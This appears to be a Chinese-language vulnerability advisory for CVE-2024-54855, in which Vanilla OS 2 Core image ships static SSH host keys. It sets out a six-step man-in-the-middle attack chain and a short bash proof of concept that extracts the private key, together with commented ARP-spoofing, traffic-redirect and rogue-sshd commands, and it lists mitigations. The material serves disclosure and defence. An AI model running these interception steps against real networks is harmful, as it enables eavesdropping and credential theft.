CVE-2024-54855 Vanilla OS 2 Core image SSH静态密钥漏洞

漏洞信息

漏洞编号

CVE-2024-54855

漏洞类型

静态密钥/硬编码凭证

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Vanilla OS 2 Core image v1.1.0

漏洞概述

CVE-2024-54855是fabricators Ltd开发的Vanilla OS 2 Core image v1.1.0版本中存在的安全漏洞。该漏洞源于SSH服务使用了静态预置密钥，而非每次安装时动态生成唯一的密钥对。攻击者可以利用这些已知的静态公钥进行中间人攻击(MITM)，拦截并可能篡改SSH通信内容。由于SSH常用于远程服务器管理和安全通信，该漏洞可能导致敏感凭据泄露、命令注入或数据篡改等严重后果。Vanilla OS是一个基于Ubuntu的不可变Linux发行版，旨在提供安全可靠的操作环境，此漏洞严重削弱了其安全设计目标。

技术细节

该漏洞的核心问题在于SSH服务配置中使用了硬编码的静态密钥对。SSH协议依赖非对称加密来建立安全通道，正常的密钥交换过程要求服务器持有唯一的私钥，客户端通过公钥验证服务器身份。然而，Vanilla OS 2 Core image v1.1.0在镜像构建时预置了固定的SSH主机密钥，这意味着所有使用该镜像部署的系统都共享相同的密钥。攻击者只需获取镜像中的静态公钥对应的私钥，即可伪造任意目标服务器的SSH身份。在客户端首次连接时若选择信任该公钥，攻击者即可插入到SSH会话中间，解密、监控甚至修改传输内容。攻击者可通过获取同一镜像的私钥或从历史版本中提取密钥来实现攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者获取Vanilla OS 2 Core image v1.1.0镜像文件，可从官方下载页面、镜像源或历史版本库获取

STEP 2

步骤2: 密钥提取

攻击者挂载镜像或解压文件系统，提取SSH静态主机密钥(通常位于/etc/ssh/ssh_host_*_key)

STEP 3

步骤3: 中间人部署

攻击者在网络路径上部署MITM攻击环境，包括ARP欺骗、流量重定向等手段

STEP 4

步骤4: 密钥注入

攻击者配置伪造的SSH服务器使用提取的静态私钥，诱骗受害者连接

STEP 5

步骤5: 会话劫持

当用户尝试SSH连接到受害服务器时，流量经过攻击者，攻击者使用静态密钥完成密钥交换并解密通信

STEP 6

步骤6: 数据窃取

攻击者可以窃取用户凭据、会话令牌、敏感命令和输出数据，甚至注入恶意命令

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-54855 PoC - Vanilla OS 2 Static SSH Key Exploitation
# This PoC demonstrates extracting and using static SSH keys for MITM attacks

# Step 1: Extract static SSH host keys from Vanilla OS 2 Core image
# Assuming image is mounted at /mnt/vanilla-image
SSH_KEY_PATH="/mnt/vanilla-image/etc/ssh/ssh_host_rsa_key"
SSH_KEY_PUB="/mnt/vanilla-image/etc/ssh/ssh_host_rsa_key.pub"

# Step 2: Copy static private key to attacker machine
cp "$SSH_KEY_PATH" /tmp/vanilla_static_key
chmod 600 /tmp/vanilla_static_key

# Step 3: Perform MITM attack using arpspoof and sslsniff
echo "[+] Starting MITM attack with static SSH key..."
# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# Perform ARP spoofing (requires arpspoof tool)
# arpspoof -i eth0 -t TARGET_IP GATEWAY_IP &

# Step 4: Redirect SSH traffic through attacker
# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

# Step 5: Use SSH honeypot with static key to intercept connections
# sshd -h /tmp/vanilla_static_key -p 2222

echo "[!] Static SSH key successfully extracted and ready for MITM"
echo "[!] Any client connecting to affected Vanilla OS systems is vulnerable"

影响范围

Vanilla OS 2 Core image v1.1.0

防御指南

临时缓解措施

临时缓解措施包括：1)不要使用存在静态密钥的镜像版本部署生产环境；2)如果已部署受影响版本，立即重新生成SSH主机密钥(ssh-keygen -A)并重启SSH服务；3)首次SSH连接时严格验证服务器指纹，避免信任未知主机；4)使用Jump Server或VPN建立安全的SSH跳板机；5)监控网络流量中的异常SSH连接行为；6)考虑使用双因素认证增强SSH登录安全。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-54855
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-54855
3 Details https://www.cvedetails.com/cve/CVE-2024-54855/
4 VulDB https://vuldb.com/cve/CVE-2024-54855
5 Link http://fabricators.com
6 Link http://vanilla.com
7 Link https://github.com/Vanilla-OS/core-image/security/advisories/GHSA-67pc-hqr2-g34h